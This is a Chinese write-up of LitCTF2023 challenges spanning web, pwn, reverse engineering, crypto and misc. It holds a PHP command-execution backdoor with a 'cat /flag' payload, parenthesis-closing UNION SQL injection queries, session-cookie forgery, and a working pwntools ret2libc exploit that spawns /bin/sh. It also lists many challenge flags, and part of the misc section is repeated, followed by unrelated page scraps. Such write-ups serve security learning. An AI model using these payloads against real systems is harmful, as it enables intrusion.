            justify-content: center;
        }

        img {
            border: none;
            width: 8rem;
            height: auto;
        }

        h1.vim_yyds {
            color: #50f728;
            display: flex;
            align-items: flex-start;
            justify-content: center;
            margin-top: 50;
            margin-left: 5px;
        }

        h3.vim_said {
            color: #39c2ff;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        br,
        p {
            font-size: 20;
        }
    </style>
</head>

<body>
    <main>
        <div class="vim">
            <img src="https://www.bing.com/th?id=OSAAS.7B95FA2D97CE022F5E7949F60E350A25&pid=TechQna"></img>
            <h1 class="vim_yyds">
                Vim yyds
            </h1>
        </div>
        <h3 class="vim_said">
            队里师傅说Vim是世界上最好的编辑器,不接受反驳
        </h3>
        <div class="can_can_vim">
            <?php
            error_reporting(0);
            $password = "Give_Me_Your_Flag";
            echo "<p>can can need Vim </p>";
            if ($_POST['password'] === base65_encode($password)) {
                echo "<p>Oh You got my password!</p>";
                eval(system($_POST['cmd']));
            }
            ?>
        </div>
    </main>
</body>

​ 注意这儿:

php 复制代码
<?php
            error_reporting(0);
            $password = "Give_Me_Your_Flag";
            echo "<p>can can need Vim </p>";
            if ($_POST['password'] === base65_encode($password)) {
                echo "<p>Oh You got my password!</p>";
                eval(system($_POST['cmd']));
            }
            ?>

​ 把Give_Me_Your_Flag进行base64编码之后得到:R2l2ZV9NZV9Zb3VyX0ZsYWc=,之后POST传入,然后进行rce,payload如下:

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag

​ flag:NSSCTF{550f422b-6b60-4216-828a-4521b82fe56f}

10、这是什么?SQL !注一下 !

​ 发现给了一句源码:

php 复制代码
$sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';

$result = $conn->query($sql);

​ 由于前半部分存在多个(,因此后边需要对括号进行闭合,之后和寻常的sql注入一样:

​ 查数据库:

sql 复制代码
?id=1))))))union select 1,group_concat(schema_name) from information_schema.schemata--+

​ 查表:

sql 复制代码
?id=1))))))union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'--+

​ 查字段名:

sql 复制代码
?id=1))))))union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining'--+

​ 查flag:NSSCTF{d97bb244-e6e7-4ee9-b764-2a28571532e5}

sql 复制代码
?id=1))))))union select 1,flag from ctftraining.flag--+

11、Flag点击就送!

​ 随便输入一个1,之后提示只有管理员能进,应该是Cookie伪造,那么看一下Cookie,

session=eyJuYW1lIjoiMSJ9.Zmbx8g.9zpH8poegrPcOfauIe1GtO1ht64

​ 应该是session伪造,猜测key为LitCTF,修改1为admin,最后拿到flag:NSSCTF{fdbe1619-9458-4e89-84fa-6e9b308e5507}

Pwn:

1、只需要nc一下~

​ 呜呜呜,这个题我竟然懵逼了,最后发现是在环境变量中 (>_<)。

​ 直接nc之后echo $FLAG即可获得flag:NSSCTF{548baafa-2de1-41c7-aafe-29b90be4f940}

2、口算题卡

​ nc连接之后发现是一个加减法运算(?)

shell 复制代码
root@MSI:/mnt/c/Users/20820/Downloads# nc node4.anna.nssctf.cn 28007

 __           ________      _________   ______       _________   ______
/_/\         /_______/\    /________/\ /_____/\     /________/\ /_____/\
\:\ \        \__.::._\/    \__.::.__\/ \:::__\/     \__.::.__\/ \::::_\/_
 \:\ \          \::\ \        \::\ \    \:\ \  __      \::\ \    \:\/___/\
  \:\ \____     _\::\ \__      \::\ \    \:\ \/_/\      \::\ \    \:::._\/
   \:\/___/\   /__\::\__/\      \::\ \    \:\_\ \ \      \::\ \    \:\ \
    \_____\___________________   \__\_____ \_____\______  \__\/     \_\/
          /_____/\     /_____/\     /_____/\     /_____/\
          \:::_:\ \    \:::_ \ \    \:::_:\ \    \:::_:\ \
              _\:\|     \:\ \ \ \       _\:\|       /_\:\ \
 _______     /::_/__     \:\ \ \ \     /::_/__      \::_:\ \
/______/\    \:\____/\    \:\_\ \ \    \:\____/\    /___\:\ '
\__::::\/     \_____\/     \_____\/     \_____\/    \______/

Welcome to the LitCTF2023 Verbal Problem Card!
You will be presented with 100 addition and subtraction problems.
Your goal is to answer all of them correctly to get the flag!
if you wrong, you will be kicked out of the game.
Good luck & Have fun!

​ 推测需要加减到一定数目才会出flag,试试吧,exp如下:

python 复制代码
from pwn import *

io = remote("node4.anna.nssctf.cn",28007)

io.recvuntil(b"Have fun!\n")

for i in range(100):
    io.recvuntil(b"What is")
    key = io.recvuntil(b"?")
    payload = flat([
        str(eval(key[:-1]))
    ])
    print(eval(key[:-1]))
    io.sendline(payload)

io.interactive()

​ 最后得到flag:Congratulations! Here's your flag:NSSCTF{757d9dc8-d946-4f97-9370-63876e41aeaf}

3、狠狠的溢出涅~

​ 检查保护:

shell 复制代码
root@MSI:/mnt/c/Users/20820/Downloads/ubuntu_pwn# checksec pwn4
[*] '/mnt/c/Users/20820/Downloads/ubuntu_pwn/pwn4'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

​ IDA 反编译;

c 复制代码
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char buf[91]; // [rsp+10h] [rbp-60h] BYREF
  unsigned __int8 v5; // [rsp+6Bh] [rbp-5h]
  int v6; // [rsp+6Ch] [rbp-4h]

  v6 = 0;
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("Leave your message:");
  read(0, buf, 0x200uLL);
  v5 = strlen(buf);
  if ( v5 > 0x50u )
  {
    puts("hacker");
    exit(0);
  }
  puts("Ok,Message Received");
  return 0;
}

​ 发现存在栈溢出漏洞,但是,也存在过滤,就是获取buf的大小,然后与0x50u进行大小比较,没有后门函数,那么就是个ret2libc,直接套公式做了。

​ 先通过puts函数泄露puts函数本身的真实地址,之后通过libc文件或者LibcSearcher库查版本拿system和/bin/sh的地址,exp如下:

python 复制代码
from pwn import *

context (os='linux', arch='amd64', log_level='debug')
context.terminal = ['tmux','splitw','-h','-l','140']

pwnfile = './pwn4'
elf = ELF(pwnfile)
libc = ELF('./libc-2.31.so')

#io = process(pwnfile)
io = remote('node4.anna.nssctf.cn',28607)

#gdb.attach(io)

pop_rdi = 0x4007d3
pop_ret = 0x400556
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x4006B0
pay = b'\x00' * (0x60+8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter('message:\n', pay)

puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.symbols['system']
bin_sh = libc_base + next(libc.search('/bin/sh\x00'))
pay2 = b'\x00' * (0x68) + p64(pop_ret) + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
io.recvuntil("message:")
io.sendline(pay2)


io.interactive()

​ flag:NSSCTF{u_r_master_of_stackoverflow_and_intoverflow}

Re:

1、世界上最棒的程序员

​ shift+f12直接找到flag:Flag: LitCTF{I_am_the_best_programmer_ever}

2、ez_XOR:

​ 直接上源码:

c 复制代码
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+0h] [ebp-80h]
  const char **v5; // [esp+4h] [ebp-7Ch]
  const char **v6; // [esp+8h] [ebp-78h]
  char Str1[50]; // [esp+1Ch] [ebp-64h] BYREF
  char Str2[26]; // [esp+4Eh] [ebp-32h] BYREF
  __int16 v9; // [esp+68h] [ebp-18h]
  int v10; // [esp+6Ah] [ebp-16h]
  int v11; // [esp+6Eh] [ebp-12h]
  int v12; // [esp+72h] [ebp-Eh]
  int v13; // [esp+76h] [ebp-Ah]
  int v14; // [esp+7Ah] [ebp-6h]
  __int16 v15; // [esp+7Eh] [ebp-2h]

  __main();
  strcpy(Str2, "E`}J]OrQF[V8zV:hzpV}fVF[t");
  v9 = 0;
  v10 = 0;
  v11 = 0;
  v12 = 0;
  v13 = 0;
  v14 = 0;
  v15 = 0;
  printf("Enter The Right FLAG:");
  scanf("%s", Str1);
  XOR(Str1, 3);
  if ( !strcmp(Str1, Str2) )
  {
    printf("U Saved IT!\n");
    return 0;
  }
  else
  {
    printf("Wrong!Try again!\n");
    return main(v4, v5, v6);
  }
}

​ XOR函数如下:

c 复制代码
size_t __cdecl XOR(char *Str, char a2)
{
  size_t result; // eax
  unsigned int i; // [esp+2Ch] [ebp-Ch]

  for ( i = 0; ; ++i )
  {
    result = strlen(Str);
    if ( i >= result )
      break;
    Str[i] ^= 3 * a2;
  }
  return result;
}

​ 那么,大致可以知道了,E`}J]OrQF[V8zV:hzpV}fVF[t字段与9进行异或运算,所以,可以写出如下exp:

python 复制代码
a = "E`}J]OrQF[V8zV:hzpV}fVF[t"
b = ""
for i in a:
    c = ord(i) ^ 9
    b += chr(c)
print(b)

​ flag:LitCTF{XOR_1s_3asy_to_OR}

3、enbase64

​ 打断点动态调试一下。然后就能看到source:gJ1BRjQie/FIWhEslq7GxbnL26M4+HXUtcpmVTKaydOP38of5v90ZSwrkYzCAuND

​ 解码即可,再看basecheck(Str1)中有str1的值,然后base64解码即可:

​ flag:LitCTF{B@5E64_l5_tooo0_E3sy!!!}

Crypto:

1、梦想是红色的 (初级)

tex 复制代码
自由友善公正公正敬业法治自由自由和谐平等自由自由公正法治诚信民主诚信自由自由诚信民主爱国友善平等诚信富强友善爱国自由诚信民主敬业爱国诚信民主友善爱国平等爱国爱国敬业敬业友善爱国公正敬业爱国敬业和谐文明诚信文明友善爱国自由诚信民主爱国爱国诚信和谐友善爱国自由友善平等爱国友善平等友善自由诚信自由平等爱国爱国敬业敬业友善爱国敬业敬业友善自由友善平等诚信自由法治诚信和谐

​ 一眼社会主义核心价值观加密,无脑梭:LitCTF{为之则易,不为则难}

2、Hex?Hex!(初级)

tex 复制代码
4c69744354467b746169313131636f6f6c6c616161217d

​ 提示hex了,无脑十六进制解密:LitCTF{tai111coollaaa!}

3、你是我的关键词(Keyworld) (初级)

tex 复制代码
IFRURC{X0S_YP3_JX_HBXV0PA}

​ 关键字加密,key是YOU,提示很明显:LITCTF{Y0U_AR3_MY_KEYW0RD}

4、家人们!谁懂啊,RSA签到都不会 (初级)

python 复制代码
from Crypto.Util.number import *
from secret import flag

m = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
e = 65537
n = p*q
c = pow(m,e,n)
print(f'p = {p}')
print(f'q = {q}')
print(f'c = {c}')
'''
p = 12567387145159119014524309071236701639759988903138784984758783651292440613056150667165602473478042486784826835732833001151645545259394365039352263846276073
q = 12716692565364681652614824033831497167911028027478195947187437474380470205859949692107216740030921664273595734808349540612759651241456765149114895216695451
c = 108691165922055382844520116328228845767222921196922506468663428855093343772017986225285637996980678749662049989519029385165514816621011058462841314243727826941569954125384522233795629521155389745713798246071907492365062512521474965012924607857440577856404307124237116387085337087671914959900909379028727767057
'''

​ 大佬直接用工具一把梭GitHub - spmonkey/Crypto 直接工具直接解密即可,我不知为啥下载不了这个工具,所以直接上答案了:

​ flag:LitCTF{it_is_easy_to_solve_question_when_you_know_p_and_q}

Misc;

1、What_1s_BASE (初级)

tex 复制代码
TGl0Q1RGe0tGQ19DcjR6eV9UaHVyM2RheV9WX21lXzUwfQ==

​ 直接base64解码即可:LitCTF{KFC_Cr4zy_Thur3day_V_me_50}

2、404notfound (初级)

​ 一张图片,记事本打开,前几行有flag:LitCTF{Its_404_but_1ts_n0t_a_page}

3、这羽毛球怎么只有一半啊(恼 (初级)

​ 拖到010里修改高度,之后得到flag:LitCTF{Fl4g_0fcourse!}

4、喜欢我的压缩包么 (初级)

​ 提示压缩包密码是6位数字,直接爆破解出密码是114514,好臭的密码:LitCTF{Do-u-like-my-zip-p4ck?}

5、Take me hand (初级)

​ 流量包分析,随便追踪一个http,在请求的POST数据中找到flag,经过url解码之后得到:LitCTF{Give_y0ur_hand_to_me!!!_plz}

6、破损的图片(初级)

​ 文件用010editor编辑,添上%png...,也就是89504E470D0A1A0A,再将图片重命名为.png图片,打开图片便是flag:LitCTF{May you, the beauty of this world, always shine.}

7、Osint小麦果汁

​ 我tm,想暴打出题人,算了,忍忍。

​ 上面看到一个很明显的字符,看起来像是wifi名,hacker&craft,直接在百度地图搜索黑客,发现了一个名字,黑客与精酿,flag:LitCTF{黑客与精酿}

8、easy_shark

​ 又是个欺负我010有问题,真服了,想暴打出题人。

​ 还是说下思路就行了吧,拖进010,修改 90 00 为 00 00即可,然后不用密码解压,追踪http流,在多个http流中找到了一个php一句话木马,然后再找,第五十几个就能找到个方程,然后两个key,应该是仿射密码,以及#后面是一个字符串,格式很想flag。之后仿射密码解决:LitCTF{w13e5hake_1s_a_900d_t3a771c_t001_a}

9、OSINT 探姬去哪了?_0

​ 又是社工 (T^T):

otfound (初级)

​ 一张图片,记事本打开,前几行有flag:LitCTF{Its_404_but_1ts_n0t_a_page}

3、这羽毛球怎么只有一半啊(恼 (初级)

​ 拖到010里修改高度,之后得到flag:LitCTF{Fl4g_0fcourse!}

4、喜欢我的压缩包么 (初级)

​ 提示压缩包密码是6位数字,直接爆破解出密码是114514,好臭的密码:LitCTF{Do-u-like-my-zip-p4ck?}

5、Take me hand (初级)

​ 流量包分析,随便追踪一个http,在请求的POST数据中找到flag,经过url解码之后得到:LitCTF{Give_y0ur_hand_to_me!!!_plz}

6、破损的图片(初级)

​ 文件用010editor编辑,添上%png...,也就是89504E470D0A1A0A,再将图片重命名为.png图片,打开图片便是flag:LitCTF{May you, the beauty of this world, always shine.}

7、Osint小麦果汁

​ 我tm,想暴打出题人,算了,忍忍。

​ 上面看到一个很明显的字符,看起来像是wifi名,hacker&craft,直接在百度地图搜索黑客,发现了一个名字,黑客与精酿,flag:LitCTF{黑客与精酿}

8、easy_shark

​ 又是个欺负我010有问题,真服了,想暴打出题人。

​ 还是说下思路就行了吧,拖进010,修改 90 00 为 00 00即可,然后不用密码解压,追踪http流,在多个http流中找到了一个php一句话木马,然后再找,第五十几个就能找到个方程,然后两个key,应该是仿射密码,以及#后面是一个字符串,格式很想flag。之后仿射密码解决:LitCTF{w13e5hake_1s_a_900d_t3a771c_t001_a}

9、OSINT 探姬去哪了?_0

​ 又是社工 (T^T):

​ 根据属性中的经纬度找到了一个地方,嘉兴市秀洲区,然后高德地图搜索"嘉兴市秀洲区 电信",出现的是电信大厦,所以:LitCTF{中国电信大厦}

相关推荐
QQ同步助手2 分钟前
C++ 指针进阶:动态内存与复杂应用
开发语言·c++
凯子坚持 c8 分钟前
仓颉编程语言深入教程:基础概念和数据类型
开发语言·华为
小爬虫程序猿10 分钟前
利用Java爬虫速卖通按关键字搜索AliExpress商品
java·开发语言·爬虫
程序猿-瑞瑞12 分钟前
24 go语言(golang) - gorm框架安装及使用案例详解
开发语言·后端·golang·gorm
qq_4335545412 分钟前
C++ 面向对象编程:递增重载
开发语言·c++·算法
易码智能20 分钟前
【EtherCATBasics】- KRTS C++示例精讲(2)
开发语言·c++·kithara·windows 实时套件·krts
一只自律的鸡21 分钟前
C语言项目 天天酷跑(上篇)
c语言·开发语言
程序猿000001号24 分钟前
使用Python的Seaborn库进行数据可视化
开发语言·python·信息可视化
一个不正经的林Sir29 分钟前
C#WPF基础介绍/第一个WPF程序
开发语言·c#·wpf
API快乐传递者33 分钟前
Python爬虫获取淘宝详情接口详细解析
开发语言·爬虫·python